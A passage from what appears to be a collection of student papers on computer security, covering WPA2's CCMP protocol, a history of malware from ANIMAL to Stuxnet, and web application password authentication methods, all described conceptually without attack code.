Wi-Fi Protected Access II (WPA2) WPA2, also known as IEEE 802.11i-2004, is the successor of WPA. It is used to replace the intermediate solution WPA to the old used protocol WEP. All the mandatory elements of IEEE 802.11i have been implemented in WPA2 and a new Advanced Encryption Standard (AES)-based encryption mode, CCMP, has been used to replace the TKIP used in WPA in order to provide additional security [24]. 5 5.1 Counter Mode with Cipher Block Chaining Message Authentication Code Protocol or CCMP (CCM mode Protocol) Background • As an encryption protocol designed for Wireless LAN products, CCMP implements the standards of the IEEE802.11i which is the amendment to the original IEEE802.11 standard. • CCMP is an enhanced data cryptographic encapsulation mechanism designed for data confidentiality and based upon the Counter Mode with CBC-MAC (CCM) of the AES standard [25]. • As the successor, CCMP is created to handle the vulnerabilities from TKIP in order to make the wireless network more secure [25]. 205 5.2 Mechanisms: • For data confidentiality, CCMP uses CCM that combines CTR whereas for authentication and integrity, CCMP uses CCM that combines CBC-MAC. • Both of the MPDU data field and selected portions of the IEEE802.11 Medium Access Control Protocol Data Unit (MPDU) header are protected by CCM. • CCMP is based on AES processing and uses a 128-bit key and a 128-bit block size and uses CCM with the following two parameters:’ ─ M = 8; indicating that the MIC is 8 octets. ─ L = 2; indicating that the Length field is 2 octets [26]. • ACCMP MPDU includes five sections: ─ The MAC header which contains the destination and source address of the data packet. ─ The CCMP header which is composed of 8 octets and consists of the packet number (PN), the Ext IV, and the key ID. ─ The CCMP uses all the values of PN, Ext IV and ID to encrypt the data unit and the MIC. ─ The data unit which is the data being sent in the packet. ─ The Message Integrity Code (MIC) which protects the integrity and authenticity of the packet and the frame check sequence (FCS) which is used for error detection and correction [25]. 5.3 Strength: • As the standard encryption protocol used in WPA2 standard, CCMP is much more secure than the TKIP protocol and WEP protocol of WPA. • For data confidentiality, CCMP ensures only authorized parties can access the information [16]. • For authentication, CCMP provides proof of genuineness of the user [27]. • CCMP also provides access control in conjunction with layer management [27]. • Due to the block cipher mode, CCMP is secure against attacks to the 2^128 steps of operation if the key for encryption is 256 bits or larger. 206 • As a result, CCMP handles a lot of weaknesses which are encountered in WPA and WEP. 5.4 Weaknesses: • The strength of the key has been limited to 2^ (n/2) (n: number of bits in the key) operations needed due to the existence of the generic meet-inthe-middle attacks [26]. 6 Conclusions: Every protocol has its strength and weakness. It is because there is always a trade-off between simplicity and performance. As shown from the above examples, those mechanism that are cheap to implement always have some server problems which caused by intentional attracters. At the same time, the increase of complexity, for example the WEP case, increases the security level of the protocol, which makes the attacking process far more complicated. After evaluating the strength and weakness of each protocol, a trend is clearly shown. Those newly invented protocols always have less weakness, compared to those that are replaced over. Nevertheless, it is not the situation where the newly invented protocols have indeed less weakness, but the fact that those weakness have not yet discovered. Just before the invention of WPA, WEP is overly welcomed and critiqued positively with little weakness. As a result, as long as the core weakness of a protocol is not discovered, it can be used widely. In contrast, a new protocol with higher complexity has to be invented. 207 7 References: 1. Lars R. Knudsen and John Erik Mathiassen, 2004, On the Role of Key Schedules in Attacks on Iterated Ciphers 2. Arvind Doraiswamy, 2006, Palisade, http://palisade.plynt.com/issues/2006Dec/wep-encryption/ 3. Peterson, W. W. and Brown, D. T, Jan 1961, Cyclic Codes for Error Detection 4. Nikita Borisov, Ian Goldberg, David Wagner, 12 Sep 2006, Intercepting Mobile Communications: The Insecurity of 802.11. 5. Maria George and Peter Alfke, 30 Apr 2007, Linear Feedback Shift Registers in Virtex Device, http://www.xilinx.com/support/documentation/application_notes/xapp2 10.pdf 6. Ivan Ristic, 18 Oct 2008, Net Security, http://www.netsecurity.org/article.php?id=1638 7. Seth Fogie, 16 Mar 2008, WPA Part2: Weak IVs, inform IT, http://www.informit.com/guides/content.aspx?g=security&seqNum=85 8. Scott Fluhrer, Itsik Mantin, and Adi Shamir, 2001, Weaknesses in the Key Scheduling Algorithm of RC4 9. Cam-Winget, Nancy; R. Housley, Russ; D. Wagner, David; J. Walker, Jesse , May 2003, Security Flaws in 802.11 Data Link Protocols 10. Thom Stark, Mar 2008, WEP2, Credibility Zero, starkrealities.com 11. Business Wire, 2001, Agree Systems is First to Solve Wireless LAN Wired Equivalent Privacy Security Issue http://findarticles.com/p/articles/mi_m0EIN/is_2001_Nov_12/ai_799542 13/?tag=content;col1 12. Kevin Beaver, 10 Jan 2010, Understanding WEP weakness, Wiley Publishing. http://www.dummies.com/how-to/content/understandingwep-weaknesses.html 13. Meyers, Mike, 2004, Managing and Troubleshooting Networks. Network+. McGraw Hill. ISBN 978-0-07-225665-9 14. Bradley Mitchell, 21 Aug 2008, AES vs TKIP for Wireless Encryption, http://compnetworking.about.com/b/2008/08/21/aes-vs-tkip-forwireless-encryption.htm 208 15. Edney, Jon; Arbaugh, William A, 15 Jul 2003, Real 802.11 Securities: Wi-Fi Protected Access and 802.11i. Addison Wesley Professional. 16. IEEE-SA Standards Board. Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications. Communications Magazine, IEEE, 2007. 17. Ciampa, Mark, 2006, CWNA Guide to Wireless LANS. Networking. Thomson. 18. IEEE standards association, 12 June 2007, IEEE 802.11, Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications. 19. Wei Dai, April 2007, VMAC: Message Authentication Code using Universal Hashing, CFRG Working Group 20. Wi-Fi Protected Acces, 4 Nov 2011, http://en.wikipedia.org/wiki/Message_authentication_code 21. Martin Beck & Erik Tews, Practical attacks against WEP and WPA, athttp://dl.aircrack-ng.org/breakingwepandwpa.pdf 22. Vivek-Ramachandran , 25 May 2011, Wireless Lan Security Megaprimer Part 23: Wpa2-Psk Cracking, http://www.securitytube.net/video/1911 23. Toshihiro Ohigashi and Masakatu Morii , A Practical Message Falsi_cation Attack on WPA, http://jwis2009.nsysu.edu.tw/location/paper/A%20Practical%20Message %20Falsification%20Attack%20on%20WPA.pdf 24. Jonsson, Jakob, 15 May 2010, On the Security of CTR + CBC-MAC, http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/c cm/ccm-ad1.pdf 25. Cole, Terry, 12 June 2007, IEEE Std 802.11-2007, New York: The Institute of Electrical and Electronics Engineers, http://standards.ieee.org/getieee802/download/802.11-2007.pdf 26. Whiting, Doug; Hifn, R. Housley, Vigil Security, N. Ferguson, MacFergus, Sep 2003, Counter with CBC-MAC (CCM), http://tools.ietf.org/html/rfc3610 27. Ciampa, Mark, 2009, Security Guide to Network Security Fundamentals 3-ed Boston, MA: Course Technology. pp. 205, 380, 381 209 210 Malicious Software: From Neumann’s Theory of Self-Replicating Software to World’s First Cyber Weapon Kaarel Nummert School of Computing, National University of Singapore, 21 Lower Kent Ridge Road, Singapore 119077 [email protected] Abstract. When John von Neumann was giving his lectures about the theory of self-replicating programs only science fiction authors could have imagined how rapidly the technology of malware would develop and that 60 years after his lectures this theory would be used to created a weapon to sabotage Iran’s nuclear program. 1 1.1 Introduction Motivation Motivation for this project came from an essay “The Growing Harm of Not Teaching Malware” by George Ledin. Professor Ledin explains how current computer science students’ knowledge of malware is roughly on a par with that of the general population of amateur computer users”. This project is an attempt to change that. 1.2 What is Malware? The term malware, short for malicious software, is used to describe software that has hidden, hostile, intrusive or annoying functionality. Based on its functionality and purpose malware is often categorized into computer viruses, worms, trojan hourses, spyware, adware, scareware, crimeware and rootkits. 2 History of Malware Although the work on computer viruses in academia began already in 1949 with John von Neumann’s lectures on “Theory and Organization of Complicated Automata”, where he discussed self-replicating programs, it was not until 1970s when the first computer viruses were written and spread in the public. 211 2.1 Pervading Animal In January 1975, John Walker created a game called ANIMAL, which contained a subroutine PERVADE. The game itself would as player to askwer 20 questions about the animal he is thinking about, and then try to guess which animal it is. While user is answering the questions PERVADE subroutine would go through every directory accessible by the user and copy the latest version of ANIMAL into it. ANIMAL was written for UNIVAC 1108 series mainframes, and it represents the first trojan horse in the history of computers.[6] 2.2 Brain The first computer virus to infect PC computers was written in January 1986 in Pakistan. It was named Brain after the company it was written by - Brain Computer Services. Surprisingly, the contact details of theauthors of Brain were included in the source code. Since internet as we know it today, did not yet exist, the virus spread via floppy discs. Despite the seemingly inefficient method of spreading, it actually reached all over the world as one of the first calls authors of the virus received was from Miami University. Brain infected boot sector of floppy discs formatted with DOS FAT file system. Although purpose of the virus was to experiment with the security of MS-DOS and it did not contain any destructive behaviour, once the virus spread to a large number of computers in United Kingdom and United States, the authors of the virus were forced to close the phone numbers revealed in the virus due to an overwhelming amount of phone calls.[8] 2.3 Jerusalem Virus While ANIMAL and Brain were non-destructive viruses, Jerusalem Virus detected in city of Jerusalem in October 1987 would destroy all executable files upon every occurance of Friday 13th. Jerusalem Virus is known as the first computer virus that caused deliberate harm to the infected system and it caused a worldwide epidemic in 1988 when the first trigger date of May 13th, 1988 occurred. 2.4 Viruses Become Multipartite and Polymorphic In October 1989, Icelander Fridrik Skulason discovered Ghostball which carried out several damaging action on the infected system, making it the first multipartite virus. In 1990, Mark Washburn and Ralf Burger developed the Chameleon family - the first family of polymorphic viruses. Polymorphic viruses mutate themselves while maintaining the original algorithm, making themselves more difficult to discover by anti-virus software. The first widespread polymorphic virus found outside labarotories was Tequila, found in 1991. 212 2.5 Rootkits In 1990 Lane Davis and Steven Dake wrote the first rootkit. Rootkit was initially named after its purpose to provide priviliged (”root”) access on UNIX operating system, but since rootkits were soon created for Microsoft Windows and Mac OS X operating systems, the term now stands for malware that provides continuous priviliged access for an attacker to the infected system.[2] 2.6 Melissa Discovered on March 26, 1999, Melissa was the first mass-mailing macro virus. Despite not originally being designed for harm, it shut down several Internet mailing systems that couldn’t handle the load of e-mails send by the virus to propagate itself. Melissa was not a standalone program, but part of Microsoft Office documents and spreadsheets that used user’s contact list in Microsoft Outlook to send itself to new victims. Melissa was written by David Smith, who was initially sentenced to 10 years but only served 20 months in a federal prison and was fined $5,000.[7] 2.7 StormWorm StormWorm was an emailer worm that utilized social engineering of the addressee from one’s trusted contacts using attached binaries or malicious code hidden into Microsoft Office attachments. Once the these reached victim’s system they launched well-known client-side attacks on Microsft Internet Explorer and Microsoft Office. StormWorm is a peer-to-peer botnet framework and backdoor Trojan horse that affects computers that use Microsoft Windows. Discovered on January 17th in 2007, StormWorm uses decentralized command and control technique to increase its chances of surviving, because there is no central point of control. Each infected machine knows 25 to 50 other ones, and therefore it is hard to track down all infected machines. Hence, StormWorm’s size was never calculated, butis estimated to have been ranging from 1 - 10 million victim systems, being the single largest botnet herd in history.[1] 2.8 Stuxnet Stuxnet is considered to be the most important malware in history. It was discovered in June 2010 and was the first malware that spies on industrial systems and first to include a programmable logic controller (PLC) rootkit. What makes it even more significant is its level of sophistication and its target. It used an unprecedented four zero-day (unknown to software developer) attacks of Windows systems, parts of it were digitally signed, an equivalent testing facility of the final target was used to test the code during development, and it was targeted to compromise Iran nuclear enrichment plants, which it likely succeeded in. 213 3 Case Study: Stuxnet Stuxnet was not an evolution in world of malware, but a revolution and the world’s first real cyber weapon. 3.1 Possible Attack Scenario Since the targets of Stuxnet were industrial control systems (ICS) operated by specialized assembly like code on programmable logic controllers (PCL), and each PLC is configured in a unique manner, the attackers must have had the ICS’s schematics. These were possibly obtained by another malware or an insider in the final target organization. Analysis done on Stuxnet show that it was carefully tailored for a specific ICS. Researchers in Symantec believe attackers must have had a mirrored environment based on the obtained schematics that included ICS hardware, PLCs, modules and peripherals to test their work on. The malicious binaries of Stuxnet contained driver files that were digitally signed by two companies. The certificates for that were probably stolen by physically entering the premises of these companies, as the two companies are in close physical proximity. Attackers behind Stuxnet targeted five organizations in Iran that they believed would help them reach their final target. Each of these initial targets were attacked in a separate attack between June 2009 and June 2010. From these organizations Stuxnet spread on to other organizations on its way to its final target, nuclear enrichment facility in Iran. Researchers in Symantec claim that the shortest time between compilation of Stuxnet and attacking a system with the compiled result was just 12 hours. The fact that Stuxnet was not designed to spread via internet but via an infected USB memory stick or via local network suggests that attackers must have had immediate access to one of the initial targets. So far researchers have managed to find three variants of Stuxnet, but they believe there is a fourth variant. One of the initial target organizations was attacked with alll three variants, suggesting attackers believed it to be a crucial step on their way to the final target.[3] 3.2 Discovering Stuxnet Normally, Iran replaced up to 10 percent of its uranium enriching centrifuges. In Natanz, the plant attacked by Stuxnet (as later discover), it would have been normal to decomission about 800 per year. In early 2010, as International Atomic 214 Energy Agency discovered, Natanz had to replace between 1,000 and 2,000 centrifuges in a few months. Although Iran was not required to explain the reason for replacing the abnormal amount of centrifuges, it was clear something had damaged the centrifuges. On June 17, 2010, Sergey Ulasen, head of computer security firm VirusBlokAda in Belarus, received a report from a customer in Iran whose computer was in a reboot loop. VirusBlokAda got hold of the virus in customer’s computer and quickly realized it was using a zero-day exploit in Windows Explorer to spread. The exploid allowed the virus use infected USB sticks to spread. On July 12, VirusBlokAda reported the exploit along with the virus to Microsoft. In a few days, Microsoft named the virus Stuxnet from combination of files found in the code (.stub and MrxNet.sys). As computer security researchers started reverse engineering and analyzing the virus, it came clear the virus had been released up to one year before it was discovered, and that it had been refined several times over time. Stuxnet was also discovered to use two digital certificates issued by two different companies in Taiwan: RealTek Semiconductor and JMicron Technology, both headquartered in a same business park in Taiwan. Despite the use of a zero-day exploit (only a few viruses out of millions use one) and stolen certificates, Stuxnet seemed rather harmless. Exprets determined that Stuxnet was designed to target Simatic WinCC Step7 software, an industrial control system by Siemens used to program controllers that drive motors, valves and switches various plants. Once Stuxnet was released to computer security organizations and Nicolas Falliere, Liam O Murchu and Eric Chien, researchers in Symantec, discovered the actual sophistication of Stuxnet. Stuxnet stored its decrypted malicious DLL files in memory only to avoid detection by antivirus software. To access these virtual DLL files Stuxnet then reprogrammed Windows API. That technique was never seen before. The researchers also discovered, that Stuxnet was using not one but four zero-day expoits, and that is was programmed to report a detailed description of every infected system and update the malicious software if needed. By eavesdropping on that traffic researchers were able to determine that majority of the infected machines were located in Iran, making it clear Iran was the centre of infection. Further investigation revealed that once Stuxnet determined a system had Siemens Step7 software, it would replace the original commands of Step7 and disable any automated alarms that might go off as a result of malicious commands. It also masked what was happening on the PLC by intercepting status reports sent from the PLC to the Step7 machine, and removing any sign of the malicious 215 commands. Finally, once Symantec researchers released their findings, a German computer security expert Ralph Langner discovered that Stuxnet was not aimlessly sabotaging PLCs, but would only attack one matching a very specific configuration. It was now when the Stuxnet discoveries started to point towards the Natanz uranium enrichment plant described earlier.[5] 3.3 Dugu In October 2011, computer security researchers came across a new backdoor known as Dugu. It was created by someone who had access to the source code of Stuxnet, most probably the same party that created Stuxnet because source code of Stuxnet has not been released, researchers and antivirus organizations only have the binaries. Unlike Stuxnet, Dugu is not targeting PCLs. Instead it collects various information about the infected system to be used for future attacks, making it a precursor for future Stuxnet-like attacks. Similarities with Stuxnet are more than obvious: both viruses share a similar driver and similarly to Stuxnet Dugu’s driver is signed by a stolen certificate issued by a Taiwan company. While Stuxnet was designed to function no longer than June 24, 2012, Dugu is reportedly designed to remove itself 36 days after infection.[4] 3.4 Aftermath Although more than 100,000 computers in Iran, Europe and United States have been found to be infected by Stuxnet, the actual attack was only conducted when suitable PLCs were found on the system. Although Stuxnet did not attack systems on its way to the final target, it chose to keep a copy of itself to be able to communicate possible updates to the final target, as it was isolated from untrusted networks.[3] It is likely that Stuxnet succeeded in completing its initial attack, but would Stuxnet have removed itself from the non-targeted systems while they were no longer needed, maybe it would have never been discovered. Stuxnet has started a new era in the history of malware, and one can only hope that in another 35 years it will not be looked back as a trivial virus the same was ANIMAL PREVADER is today. 216 References 1. Davis, M.A., Bodmer, S.M., LeMasters, A.: Hacking ExposedTM Malware & Rootkits: Malware & Rootkits Secrets and Solutions The McGwar-Hill Companies (2010) 2. Aycock, J.: Computer Viruses and Malware Sringer Sciende+Business Media, LLC (2006) 3. Falliere, N., O Murchu, L., Chie, E.: W32.Stuxnet Dossier Symantec Security Response (February 2011) 4. W32.Dugu: The precursor to the next Stuxnet Symantec Security Response (November 2011) 5. http://www.wired.com/threatlevel/2011/07/how-digital-detectives-decipheredstuxnet/all/1 6. http://www.fourmilab.ch/documents/univac/animal.html 7. http://en.wikipedia.org/wiki/Melissa (computer virus) 8. http://campaigns.f-secure.com/brain/virus.html 217 218 Password Authentication for Web Applications Shi Hua Tan, Wen Jie Ea, Rudyanna Tan Abstract. Web applications are vulnerable to a whole array of attacks when the applications are insecure. This gives rise to threats to both the server and client. In this paper, we explore the vulnerability of web applications based on the 5 most common attacks on web applications, especially the threats of authentication hacking, highlighting the possible methods an attacker might utilize. Our focus would be the analysis of different possible methods of securing a web application using the different methods of password authentication. Finally, we give an evaluation of the various methods discussed, offering suggestions of password authentication for web developers to employ. Keywords: Password authentication, Web application security 1 Introduction With vulnerabilities in web applications, there exists the need for security to protect one’s sensitive data and improve one’s security posture. If the site is vulnerable, the attacker could break into the system by proving to the application that he/she is a known and valid user, and then the attacker can gain access to whatever privileges the administrator assigned to that user. Hence, if the attacker manages to enter as an administrative user with global access on the system, he/she would have almost total control on the application together with its content. 1.1 Threats to Web Applications Web applications offer services such as mail services, online shops, or database administration, which increase the exposed surface area by which a system can be exploited. Web applications, by their nature, are often widely accessible to the Internet which means that there are a very large number of potential attackers. These factors caused web applications to become a very attractive target for attackers, leading to numerous attack methods. In this paper, authentication hacking will discussed in detail. 1.2 Authentication Hacking – What is it? In general, an attacker first tries to gain access to the login screen where the application would request a login and password. Next, he/she would need to enter a correct match of login and password that the application would recognize as correct 219 and which has high privileges in the system, in order to gain access into the system. Among attacks, password guessing is often one of the most effective techniques to defeat web authentication. It can be carried out either manually or via automated procedures. 1.3 Authentication Hacking – Possible Procedures Network Sniffing. Network sniffing uses specialized hardware and software to access information that is not being sent to someone or analyze networks to which individuals do not have legitimate access [7]. After information is sent over a network, it is broken up into packets which contain a small amount of the information, the addresses of the receiver and sender and some technical data. Specialized hardware or software can intercept and copy these packets. By analyzing the addresses and packet information, a person can learn about the internal network hardware and specific addresses which may highlight security vulnerability or a previously unknown method of entering the network. Information theft could arise as the packets contain a small amount of information which is lightly encoded and thus unsecured. People can open the packets and search through the data for important information. Malicious or Weak Security Websites. Phishing. A phishing scam is an identity theft scam via email. The email appears to come from a legitimate source such as a trusted business or financial institution, and includes an urgent request for personal information such as invoking critical need to update an account immediately [6]. Clicking on the link provided in the email leads to an official-looking website. However, personal information provided to the site goes to the scam artist directly. People are tricked into providing personal information including credit card numbers, passwords, bank account numbers, ATM pass codes and individual’s identity numbers. Virus protectors and firewalls do not catch these phishing scams as they do not contain any suspicious code, while spam filters let them pass because they appears to come from legitimate sources. Brute Force Attack. A brute force attack is a trial-and-error attack which involves cracking a password by trying every possible password to access encrypted data or accounts without the authorization to do so [4]. A program could be used to enter all of the possible password combinations such as letter combinations, number combinations and letter-and-number combinations, one by one, until the correct combination is found. This method of cracking codes can be difficult, but is not impossible. Its success depends on the length of the password and the values that may be included as part of it. However, the success rate may be reduced if the account has security measures that lock the account once an incorrect password has been entered a particular number of times. 220 Dictionary Attack. A dictionary attack is an attempt to literally use every word in the dictionary as a means of identifying the password associated with an encrypted data or accounts [5]. In order to increase the potential for success, hackers will attempt to utilize as many words as possible when planning a dictionary attack. The words can come from a traditional dictionary, various types of technical or industry related dictionaries and glossaries, including dictionaries in different languages to increase the chances for associating a password In addition, software could be used to scramble the contents of the dictionary as a means of locking in on any random collections of letters. The hacker may also include numbers and various types of punctuation in this random mix, making the chances of identifying more complex passwords a possibility. While this approach could be very effective when a single word is used for the password, it is much less likely to succeed if the user has utilized a rather complicated password. Pharming. Pharming is a type of Internet fraud in which the attacker attempts to redirect Internet users from legitimate websites to fraudulent or potentially malicious ones. It is somewhat similar to phishing [10]. Pharming, however, attempts to redirect users to fraudulent websites without any type of bait message or other action by the users. Pharming attacks try to inherently corrupt the process by which a user accesses Internet websites. This is to redirect the user to a malicious website without the user ever knowing he/she is under-attacked. This process can be achieved by either through a compromised Domain Name System (DNS) server or through a compromised router or network. Compromised Domain Name System (DNS) Server. DNS servers direct Internet users to websites by converting textual hostnames such as www.google.com into numerical Internet protocol (IP) addresses that servers recognize. By poisoning a DNS server, a pharming attack allows an attacker to redirect large numbers of users from the legitimate website to a malicious website, without the users ever realizing an attack has happened [10]. The users typed the correct hostname but would be directed by the poisoned DNS server to the IP address of the malicious website. This malicious website could then either install malicious software onto the users’ computers, or appear legitimate and wait for the users to enter their private information and collect them for fraudulent purposes. Compromised router or network. This could be attained through malicious software that rewrites the firmware built into the device [10]. Firmware is the software installed within a device itself which manages the basic functions of the device regardless of other hardware or software used with it. In the case of routers and network servers, the firmware usually comprises of directions for which DNS server system should use. So, a pharming attack could potentially change this firmware to tell the router to use a specific DNS server that is either controlled by the attacker, or that has already been poisoned. Antivirus and firewall programs, on the whole, cannot protect users from pharming attacks. More sophisticated programs are needed to secure network servers and routers. 221 Malware on Client Machines. Spyware. Spyware are programs that utilize users’ Internet connection, normally without their knowledge or permission, to send information from their personal computer to other computer. [9] The information sent could be a record of ongoing browsing habits, downloads, or even personal data. Session Hijacking, Fabricated Transactions. Session hijacking happens when a third party takes over a web user session by obtaining the session key and pretending to be the authorized user of that key [8]. Once the hijacker has successfully initiated the hijacking, he/she can use any of the privileges connected with that user to perform tasks, including use of information that are being passed between the original user and any participants. Depending on the type of actions made, session hijacking may either be promptly noticeable to all participants involved or be almost undetectable. The procedure of session hijacking focuses on the protocols used to establish a user session. The session ID is typically stored in a cookie or embedded in a URL. Some form of authentication on the user is required to initiate the session. The hijacker can then make use of defects in the security of the network and capture the important authentication information. Once the user is identified, the hijacker can monitor every data exchange that takes place during the session and use those data in any way he/she desires. 1.4 Vulnerability of Web Applications While there are protective measures to identify and remove vulnerabilities, those measures may not be well implement or sufficient, as such, vulnerabilities still exist in web applications. Five common web application attacks will be discussed, according to their critical rate from highest to lowest. Remote Code Execution. Improper coding errors lead to remote code execution. It allows an attacker to run arbitrary, system level code on the vulnerable server and retrieve any desired information [11]. Exploitation of this vulnerability can also lead to a total system compromise with the same rights as the Web server itself. It is difficult to discover this vulnerability during penetration tests but problems are often revealed while doing a source code review. SQL Injection. An attacker is able to retrieve crucial information from a Web server's database through SQL injection [11]. The impact of the attack varies from basic information disclosure to remote code execution and total system compromise, depending on the application's security measures. Format String Vulnerabilities. This vulnerability results from the use of unfiltered user input as the format string parameter in certain Perl or C functions that perform formatting [11]. An attacker can make use of %s, %x and %d, %u or %x to perform 222 denial of service, reading and writing attacks where the attacker can cause a program to crash, has unauthorized access to information and edit data, respectively. Cross-Site Scripting (XSS). An attacker could craft a URL which appears to be legitimate at first look but when the victim opens the URL, the attacker can effectively execute something malicious in the victim's browser [11]. Username Enumeration. An attacker can make use of the vulnerability of the backend validation script to tell the attacker if the supplied username is correct or not [11]. By being able to do so, the attacker would be able to determine valid usernames from the type of different error messages he/she received. 2 Password Authentication Password authentication is the process of determining the identity of an individual who is accessing a system. It is typically achieved via a logon process with web user ID or usernames, passwords and/or e-mail. It includes the setup process where the user chooses his/her password and the hash of the password will be stored in a password file. Later, when the user logs into the system by supplying his/her password, the system computes the hash of the password entered and compares to the file. Once the hash and the file match, the user has been authenticated; he/she can then be authorized to perform certain actions within the system. Various password authentication methods will be discussed below. Methods of Password Authentication HTTP Basic Authentication. Basic HTTP authentication is called so because it is defined in Hypertext Transfer Protocol (HTTP) standard. When a request is made from a client to a web browser, it sends a message header in the form: “wwwAuthenticate: Basic” [24]. The web browser or client provides a username and password while making a request to the server. The username is concatenated with the password in Base64 encoding. The string in Base 64 encoding is then sent to the server to be decoded. The result is a colon separating the username and password. For instance, the username HarryPotter and password Gryffindor would appear as the string ‘HarryPotter:Gryffindor’ Implementation of Basic Authentication. A client requests access to a protected resource. The web server returns a dialog box that asks for the username and password of the client. The client then submits his/her username and password to the server and awaits validation. The server validates the credentials and if successful, the server returns the requested resource to the client. 223 Fig 1. Using HTTP Basic Authentication to authenticate a client to a server. (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html) Fig 2. HTTP basic authentication to connect to a secured server: requesting a username and password. (Source: http://wiki.openqa.org/display/WTR/Basic+Authentication) Advantages and Disadvantages of HTTP Basic Authentication Advantages: Basic access authentication supports all web browsers, in other words, it is a relatively simple scheme to implement. Sessions are stored in caches. This allows the user to enter the server multiple times without having to log in each time. Disadvantages: HTTP basic authentication is not particularly secure. Basic authentication sends usernames and passwords over the Internet as plaintext that is not encrypted. Thus, it relies on the connection to be secure or trusted such that no interception occurs. This may be a problem too as the target server is also not authenticated, increasing the possibilities for man-in-the-middle attacks. Although the caching of sessions serves as a convenience, it is also insecure. Information is retained in session caches until the user clears his/her browsing history. This means that if the user does not properly log off the server, his/her information is still within the cache and another user would be able to access his/her session without any passwords required [16]. 224 Form Based Authentication. Form based authentication may seem somewhat similar to HTTP basic authentication. However, it does not use HTTP authentication techniques. Instead, it uses HTML form fields for the username and password values [16]. Implementation of Form Based Authentication. When using form based authentication, the server first checks the client’s user authentication. If the user is authenticated, the server returns a reference of the requested resource. Otherwise, the user is presented with a ‘form’ to fill in, giving rise to the naming of the method. He fills in the form before being granted access to a particular site, similar to a login. If the login succeeds, the server redirects the client to the resource. Upon failure, the client is redirected to an error page. Fig 3. Using Form Based Authentication to authenticate a client to a server (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html) Advantages and Disadvantages of Form Based Authentication Advantages: Sessions are timed. This means that after a certain amount of idle time or inactivity, the session would end and the user would be required to log in to the server again. This increases the security slightly from HTTP basic authentication in the instance when a user forgets to log off his/her session. It is particularly useful for public access machines such as computer terminals in airports and LAN shops. Disadvantages: Form based authentication has the same security issues as basic HTTP authentication, where passwords are sent in plaintext. The target server is also not authenticated. Client-Certificate Authentication. Client certificate authentication uses HTTP over Secure Sockets Layer (SSL). This procedure does not occur at the message layer using user IDs and passwords or tokens. Instead, the authentication occurs during the handshake using SSL certificates. [27] 225 Implementation of Client-Certificate Authentication. The server authenticates the server through public key certificates, which essentially use a digital signature to bind a public key with an identity – information like the name of the person or the organization, making it a secure. The public key certificate is issued by a trusted organization, a certificate authority (CA) for instance, VeriSign [18],[29]. The authentication uses public-key encryption and digital signatures to confirm that the server is who he claims to be. Upon authentication, the client and server use symmetric-key encryption to encrypt all the information exchanged. Advantages and Disadvantages of Client-Certificate Authentication Advantage: Authenticity is offered in the verification of the owner through the additional information given such as the name of the person or the organization. It is confidential in that it ensures the data transferred is not disclosed to unauthorized people. Because it is secure, it ensures that any modification of data is done only by the authorized person or company. As such, any modification or transaction cannot be denied by the participant, enduring non-repudiation [13],[17]. Disadvantage: Cost is the main disadvantage. In order to obtain a trusted infrastructure, the user needs to validate his/her identity with a trusted organization such as VeriSign [28]. Another disadvantage may be the performance due to the larger amount of resources required since the information sent is encrypted. Fig 4. Client-certificate authentication utilized in PayPal as a proof to clients that it is a legitimate server. Certificate is verified by VeriSign. (Source: RedHat, Certificates and Authentication) Mutual Authentication. Mutual Authentication, which is also known as two-way authentication, is a security feature or process in which both entities in a communications link authenticate each other. In a network environment, the end user (client side) must prove his/her identity to a web application provider (server side), 226 and the server must prove its identity to the client, before any application traffic is sent over the connection. In other words, a connection can occur only when the client trusts the server's digital certificate and the server trusts the client's certificate [33]. Mutual authentication should not be confused with the two-way factor which electronic banking websites normally implements. Implementation of Mutual Authentication. The exchange of certificates is carried out by means of the Transport Layer Security (TLS) protocol. After the process of exchanging certificates and setting up connection properties which is called the Secure Sockets Layer (SSL) handshake, a connection is only possible. If the client's keystore contains more than one certificate, the certificate with the latest timestamp is used to authenticate the client to the server [25]. This reduces the risk that an unsuspecting network user carelessly reveals account credentials to malicious websites. It is best to be implemented with HTTP over SSL for added security. Fig 5. Using Mutual Authentication to verify the authenticity of both the client and server. (Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html) Advantages and Disadvantages of Mutual Authentication Advantage: By using the mutual authentication method, end users can be assured that they are communicating with legitimate web applications, and servers can ensure that all users are attempting to gain access for legitimate purposes. It prevents attackers from impersonating entities to steal users’ account credentials in order to commit fraud [15]. Mutual authentication can also prevent various forms of online fraud such as man-in-the-middle attacks, malware, shoulder surfing, keystroke logging and pharming. It minimizes the risk of online fraud in electronic banking or commerce activities. 227 Disadvantage: However, most web applications are designed in such a way that no client-side certificates are required [14]. This is because of the issues with cost and complexity. Hence, the lack of mutual authentication will create opportunity for manin-the-middle attacks. Besides that, the management of root certificate authorities in client browsers, applications and operating systems is relatively important. For example, the attacker can explicitly change the digital certificate of certificate authorities (CAs) in client browsers to trick the client into believing a malicious website is legitimate. Digest Authentication. Digest authentication is an authentication method in which a request from a potential user is received by a network server and then sent to a domain controller [30]. The controller will return a digest session key to the server that received the request. Subsequently, the user has to generate a response which is encrypted before sending it to the server. If the response is correct, the server grants permission on the user access to the web application for a single session. Implementation of Digest Authentication. The authentication is based on a simple challenge-response paradigm. Server generates challenges using a nonce value. A valid response from client contains a MD5 checksum (by default) of username, password, nonce value provided, HTTP method, and requested URI. This form of response is specified in RFC2617 [24]. The MD5 digest value is a 128-bit hash value which is intended to be a one-way message digest, but there are studies shown that MD5 is breakable and not collision resistant [33]. Advantages and Disadvantages of Digest Authentication Advantage: Digest authentication is developed to tackle the fundamental problem of basic authentication which is the plaintext transmission of user’s password over physical network. The user’s password is not used directly in the MD5 digest, thus it allows some implementations to store the digest values instead of the plaintext password. Client nonce in the response allows the client to prevent chosen-plaintext attacks. The server nonce can include timestamps, allowing the server to inspect nonce attributes sent by clients to prevent replay attacks. Lastly, the server is allowed to maintain a list of recently issued server nonce values to prevent reuse. Disadvantage: In general, digest authentication is an enhanced form of single factor authentication. A single factor authentication is vulnerable to man-in-the-middle attacks. It has no mechanism for clients to identify the server’s legitimacy. Furthermore, most of the security options specified in RFC 2617 are optional. If the server is not strict in the quality of protection, the client might operate in a lower security RFC 2069 digest authentication. This authentication is also vulnerable to a man-in-the-middle attack as an attacker can instruct the clients to use a RFC2069 digest authentication [23]. Another weakness lies in the passwords that must be stored 